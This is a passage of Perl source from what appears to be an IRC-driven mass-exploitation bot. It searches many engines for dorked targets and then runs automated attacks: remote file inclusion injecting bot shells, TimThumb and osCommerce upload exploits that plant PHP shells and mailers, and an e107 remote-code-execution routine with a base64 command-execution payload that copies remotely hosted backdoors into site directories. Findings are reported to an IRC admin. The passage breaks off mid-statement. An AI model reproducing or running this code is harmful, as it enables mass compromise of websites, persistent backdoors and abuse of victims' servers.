&type($chan,$bug,$dork,"AW",$type,$nick); } exit; } } if ($engine =~ /ac/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AC",$type,$nick); } exit; } } if ($engine =~ /bj/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BJ",$type,$nick); } exit; } } if ($engine =~ /bm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BM",$type,$nick); } exit; } } if ($engine =~ /bt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BT",$type,$nick); } exit; } } if ($engine =~ /io/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IO",$type,$nick); } exit; } } if ($engine =~ /bn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BN",$type,$nick); } exit; } } if ($engine =~ /bf/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BF",$type,$nick); } exit; } } if ($engine =~ /kh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KH",$type,$nick); } exit; } } if ($engine =~ /cm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CM",$type,$nick); } exit; } } if ($engine =~ /cv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CV",$type,$nick); } exit; } } if ($engine =~ /ky/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KY",$type,$nick); } exit; } } if ($engine =~ /cf/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CF",$type,$nick); } exit; } } if ($engine =~ /cx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CX",$type,$nick); } exit; } } if ($engine =~ /cw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CW",$type,$nick); } exit; } } if ($engine =~ /cy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CY",$type,$nick); } exit; } } if ($engine =~ /fk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FK",$type,$nick); } exit; } } if ($engine =~ /fo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"FO",$type,$nick); } exit; } } if ($engine =~ /gh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GH",$type,$nick); } exit; } } if ($engine =~ /gd/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GD",$type,$nick); } exit; } } if ($engine =~ /gp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GP",$type,$nick); } exit; } } if ($engine =~ /gu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GU",$type,$nick); } exit; } } if ($engine =~ /gn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GN",$type,$nick); } exit; } } if ($engine =~ /gy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GY",$type,$nick); } exit; } } if ($engine =~ /hm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HM",$type,$nick); } exit; } } if ($engine =~ /iq/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"IQ",$type,$nick); } exit; } } if ($engine =~ /jm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"JM",$type,$nick); } exit; } } if ($engine =~ /ki/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KI",$type,$nick); } exit; } } if ($engine =~ /kw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KW",$type,$nick); } exit; } } if ($engine =~ /la/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LA",$type,$nick); } exit; } } if ($engine =~ /lb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LB",$type,$nick); } exit; } } if ($engine =~ /lr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LR",$type,$nick); } exit; } } if ($engine =~ /mo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MO",$type,$nick); } exit; } } if ($engine =~ /mg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MG",$type,$nick); } exit; } } if ($engine =~ /mv/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MV",$type,$nick); } exit; } } if ($engine =~ /mp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MP",$type,$nick); } exit; } } if ($engine =~ /mq/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MQ",$type,$nick); } exit; } } if ($engine =~ /mr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MR",$type,$nick); } exit; } } if ($engine =~ /yt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YT",$type,$nick); } exit; } } if ($engine =~ /md/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MD",$type,$nick); } exit; } } if ($engine =~ /mc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MC",$type,$nick); } exit; } } if ($engine =~ /me/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ME",$type,$nick); } exit; } } if ($engine =~ /mz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MZ",$type,$nick); } exit; } } if ($engine =~ /nr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NR",$type,$nick); } exit; } } if ($engine =~ /nc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NC",$type,$nick); } exit; } } if ($engine =~ /ng/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NG",$type,$nick); } exit; } } if ($engine =~ /nu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NU",$type,$nick); } exit; } } if ($engine =~ /pw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PW",$type,$nick); } exit; } } if ($engine =~ /ps/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PS",$type,$nick); } exit; } } if ($engine =~ /cq/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CQ",$type,$nick); } exit; } } if ($engine =~ /re/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RE",$type,$nick); } exit; } } if ($engine =~ /lc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LC",$type,$nick); } exit; } } if ($engine =~ /pm/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PM",$type,$nick); } exit; } } if ($engine =~ /st/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ST",$type,$nick); } exit; } } if ($engine =~ /rs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RS",$type,$nick); } exit; } } if ($engine =~ /gs/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GS",$type,$nick); } exit; } } if ($engine =~ /sl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SL",$type,$nick); } exit; } } if ($engine =~ /sx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SX",$type,$nick); } exit; } } if ($engine =~ /sb/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SB",$type,$nick); } exit; } } if ($engine =~ /so/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SO",$type,$nick); } exit; } } if ($engine =~ /su/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SU",$type,$nick); } exit; } } if ($engine =~ /kn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KN",$type,$nick); } exit; } } if ($engine =~ /sr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SR",$type,$nick); } exit; } } if ($engine =~ /tz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TZ",$type,$nick); } exit; } } if ($engine =~ /tl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TL",$type,$nick); } exit; } } if ($engine =~ /tg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TG",$type,$nick); } exit; } } if ($engine =~ /tk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TK",$type,$nick); } exit; } } if ($engine =~ /tn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TN",$type,$nick); } exit; } } if ($engine =~ /tc/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"TC",$type,$nick); } exit; } } if ($engine =~ /vu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"VU",$type,$nick); } exit; } } if ($engine =~ /wf/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WF",$type,$nick); } exit; } } if ($engine =~ /ye/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YE",$type,$nick); } exit; } } if ($engine =~ /zw/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ZW",$type,$nick); } exit; } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLe",$type,$nick); } exit; } } if ($engine =~ /yahoo2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo2",$type,$nick); } exit; } } if ($engine =~ /kvasir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR",$type,$nick); } exit; } } if ($engine =~ /quint/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Quint",$type,$nick); } exit; } } if ($engine =~ /pagina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Pagina",$type,$nick); } exit; } } if ($engine =~ /clix/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clix",$type,$nick); } exit; } } if ($engine =~ /ask2/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"ask2",$type,$nick); } exit; } } if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type,$nick); } exit; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type,$nick); } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"WaLLa",$type,$nick); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaHoo",$type,$nick); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsK",$type,$nick); } exit; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OnEt",$type,$nick); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CLusTy",$type,$nick); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaPo",$type,$nick); } exit; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AoL",$type,$nick); } exit; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"LyCos",$type,$nick); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"HotBot",$type,$nick); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SeZNam",$type,$nick); } exit; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UoL",$type,$nick); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CLusTy",$type,$nick); } exit; } } if ($engine =~ /webcrawler/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"webcrawler",$type,$nick); } exit; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"clusty",$type,$nick); } exit; } } if ($engine =~ /witch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"witch",$type,$nick); } exit; } } if ($engine =~ /amidalla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"amidalla",$type,$nick); } exit; } } if ($engine =~ /gibla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"gibla",$type,$nick); } exit; } } if ($engine =~ /mywebsearch/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"mywebsearch",$type,$nick); } exit; } } if ($engine =~ /dogpile/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"dogpile",$type,$nick); } exit; } } if ($engine =~ /infocom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"infocom",$type,$nick); } exit; } } if ($engine =~ /searchcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"searchcom",$type,$nick); } exit; } } if ($engine =~ /teoma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"teoma",$type,$nick); } exit; } } if ($engine =~ /volunia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"volunia",$type,$nick); } exit; } } if ($engine =~ /izito/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"izito",$type,$nick); } exit; } } if ($engine =~ /onyet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"onyet",$type,$nick); } exit; } } if ($engine =~ /askom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"askom",$type,$nick); } exit; } } if ($engine =~ /becak/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"becak",$type,$nick); } exit; } } if ($engine =~ /bokep/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"bokep",$type,$nick); } exit; } } if ($engine =~ /searchnz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"searchnz",$type,$nick); } exit; } } if ($engine =~ /baidu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BaiDu",$type,$nick); } exit; } } } ###### EXPLOITING ####### sub zero_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rfilogo4,1$engine0,1 Selesai gan..."); } my $coba = "http://".$site.$bug."test??"; my $test = "http://".$site.$bug.$injectorrfi."??"; my $dor = "http://".$site.$bug.$botshellrfi."??"; my $dor2 = "http://".$site.$bug.$botshellrfi2."??"; my $cek = &get_content($coba);sleep(1); &get_content($dor);sleep(1); &get_content($dor2);sleep(1); if ($cek =~ /failed to open stream/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &rfi_xpl($test,$chan,$site); exit;} } } } } } sub rfi_xpl() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $dor = $url.$botshellrfi."??"; my $dor2 = $url.$botshellrfi2."??"; my $test = $url.$injectorrfi."??"; my $vuln = $url." 4,1(0,1*4,1FULLMAGIC0,1*4,1)"; my $check = &get_content($test); &get_content($dor);sleep(1); &get_content($dor2);sleep(1); if ( $check =~ /BArNEr/i ) { my $safe =""; my $os =""; my $id =""; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) {$safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ m/Uid : (.*?)<\/br>/) {$id = $1;} &msg("$chan","$rfilogo(4,1@0,1VuLn4,1)0,1 Target send to $nick (4,1@0,1OS= $os4,1)(0,1@4,1id= $id9)(4,1@0,1safemode $safe4,1)"); &msg("$nick","$rfilogo(4,1@0,1VuLn4,1)0,1 ".$vuln."4,1(0,1@4,1SafeMode= $safe0,1)(4,1@0,1OS= $os4,1)(0,1@$id9)"); &msg("$admin","$rfilogo(4,1@0,1VuLn4,1)0,1 ".$vuln."4,1(0,1@4,1SafeMode= $safe0,1)(4,1@0,1OS= $os4,1)(0,1@$id9)"); } else {&msg("$chan","$rfilogo(4,1@0,1VuLn4,1)0,1 ".$vuln." (4,1@0,1safemode-on4,1)");} } sub thumb_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$thumblogo4,1$engine0,1 Searching..."); } my $vuln = "http://".$site.$bug."?src=".$timid; my $vulnx = "http://".$site.$bug."?src=".$timidx; my $vulnxx = "http://".$site.$bug."?src=".$timid3; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my @nbug = split(/\//,$bug); my $cek = &get_content($vuln);sleep(1); my $cekx = &get_content($vulnx);sleep(1); if ($cek =~ /Unable to open image.(.*?)$nbug[0](.*?)$md5php/i){ if ($cekx =~ /Unable to open image.(.*?)$nbug[0](.*?)$md5cps/i){ &msg("$chan","$thumblogo(4,1$engine0,1)4,1 http://$site "); sleep(2); my $pdir = $2; if ($spreadMode == 1) { &get_content($vulnxx);sleep(1); } my $crut = "http://".$site.$nbug[0].$pdir.$md5php; my $crutx = "http://".$site.$nbug[0].$pdir.$md5cps; my $botx = "http://".$site.$nbug[0].$pdir.$md5bot; my $npath = "http://".$site."/wp-includes/wp-info.php"; my $check = &get_content($crut."?clone");sleep(1);&get_content($crutx);sleep(1);&get_content($botx);sleep(1); if ($check =~ /Arhy-4ntCrew/i){ my $crot = &get_content($npath);sleep(1); if ($crot =~ /Arhy-4ntCrew/i){ &os($npath,$chan,$engine,$thumblogo,$nick); } else { &os2($crut,$chan,$engine,$thumblogo,$nick); } } } } exit; } } } } sub osco2_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$oscologo 4,1$engine Selesai"); } my $osc = "http://".$site."admin/categories.php/login.php"; my $osc2 = "http://".$site."admin/file_manager.php/login.php"; my $osc3 = "http://".$site."admin/banner_manager.php/login.php"; my $oshell = "http://".$site."images/.htaccess"; my $oshells = "http://".$site."images/version.php"; my $barner = "http://".$site."images/banners.php"; my $barner2 = "http://".$site."images/user.php"; my $barner3 = "http://".$site."images/mailer.php"; my $barner4 = "http://".$site."images/.images.php"; my $magic = "full://".$site."images/version.php?x=anonymous"; my $oscx = &get_content($osc); my $oscy = &get_content($osc2); my $oscz = &get_content($osc3); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($oscx =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) { my $oscox = LWP::UserAgent->new; my $res = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./tongue.gif' => '.htaccess' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string; my $resx = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./smile.gif' => 'version.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resx->as_string; my $resx2 = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./sad.gif' => 'banners.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resx2->as_string; my $resx3 = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./sadow.gif' => 'user.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resx3->as_string; my $resx4 = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./mailer.gif' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resx4->as_string; my $resx5 = $oscox->post($osc."?cPath=&action=new_product_preview",['products_image' => ['./scam.gif' => '.images.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resx5->as_string; &get_content($oshell);&get_content($barner);&get_content($barner2);&get_content($barner3);&get_content($barner4);sleep(3); my $xxx = &get_content($oshells); if ($xxx =~ /PHP Version/) { my $os = ""; if ($xxx =~ m/System <\/td>(.*?)<\/td>/) {$os = $1;} &msg("$admin","$engine $magic $os ");sleep(1); &msg("$chan","mailer $barner3 $os "); } elsif ($xxx =~ /System <\/td>(.*?)<\/td>/) { #&msg("$admin","Fuck"); } } } exit; } } } } sub e107_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$e107logo4,1$engine0,1 Searching..."); } my $test = "http://".$site.$bug; my $code = "ZWNobyAic1V4Q3Jldzxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gSVJDc3lzdGVtIjsKJGVzZWd1aWNtZD1leCgkY21kKTsKZWNobyAkZXNlZ3VpY21kOwpmdW5jdGlvbiBleCgkY2ZlKXsKJHJlcyA9ICcnOwppZiAoIWVtcHR5KCRjZmUpKXsKaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpewpAZXhlYygkY2ZlLCRyZXMpOwokcmVzID0gam9pbigiXG4iLCRyZXMpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7CiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7CkBvYl9zdGFydCgpOwpAc3lzdGVtKCRjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2JfZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7CkBvYl9zdGFydCgpOwpAcGFzc3RocnUoJGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl9lbmRfY2xlYW4oKTsKfQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpewokcmVzID0gIiI7CndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0KQHBjbG9zZSgkZik7Cn19CnJldHVybiAkcmVzOwp9"; my $html = &e107_rce_query($test,$code); if ($html =~ /sUxCrew
sys:(.+?)
IRCsystem/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $sys = $1; my $upload = 'if(@copy("'.$backdoor.'","pro.php")) { echo "manteb";@copy("'.$backdoor2.'","prod.php");@copy("'.$botshell.'","foto81.php");@copy("'.$botshell2.'","foto82.php");@copy("'.$botshell3.'","foto83.pl");} elseif(@copy("'.$backdoor.'","themes/pro.php")) { echo "maknyus_dthem";@copy("'.$backdoor2.'","themes/prod.php");@copy("'.$botshell.'","themes/foto81.php");@copy("'.$botshell2.'","themes/foto82.php");@copy("'.$botshell3.'","themes/foto83.pl");} elseif(@copy("'.$backdoor.'","plugins/pro.php")) { echo "maknyus_dplug";@copy("'.$backdoor2.'","plugins/prod.php");@copy("'.$botshell.'","plugins/foto81.php");@copy("'.$botshell2.'","plugins/foto82.php");@copy("'.$botshell3.'","plugins/foto83.pl");} elseif(@copy("'.$backdoor.'","images/pro.php")) { echo "maknyus_dima";@copy("'.$backdoor2.'","images/prod.php");@copy("'.$botshell.'","images/foto81.php");@copy("'.$botshell2.'","images/foto82.php");@copy("'.$botshell3.'","images/foto83.pl");} elseif(@copy("'.$backdoor.'","plugins/log/logs/pro.php")) { echo "maknyus_dplog";@copy("'.$backdoor2.'","plugins/log/logs/prod.php");@copy("'.$botshell.'","plugins/log/logs/foto81.php");@copy("'.$botshell2.'","plugins/log/logs/foto82.php");@copy("'.$botshell3.'","plugins/log/logs/foto83.pl");} elseif(@copy("'.$backdoor.'","files/public/avatars/pro.php")) { echo "maknyus_dflica";@copy("'.$backdoor2.'","files/public/avatars/prod.php");@copy("'.$botshell.'","files/public/avatars/foto81.php");@copy("'.$botshell2.'","files/public/avatars/foto82.php");@copy("'.$botshell3.'","files/public/avatars/foto83.pl");} elseif(@copy("'.$backdoor.'","main/pro.php")) { echo "maknyus_dma";@copy("'.$backdoor2.'","main/prod.php");@copy("'.$botshell.'","main/foto81.php");@copy("'.$botshell2.'","main/foto82.php");@copy("'.$botshell3.'","main/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_themes/pro.php")) { echo "maknyus_ethem";@copy("'.$backdoor2.'","e107_themes/prod.php");@copy("'.$botshell.'","e107_themes/foto81.php");@copy("'.$botshell2.'","e107_themes/foto82.php");@copy("'.$botshell3.'","e107_themes/foto83.pl");} elseif(@copy("'.$backdoor.'","e107_plugins/pro.php")) { echo 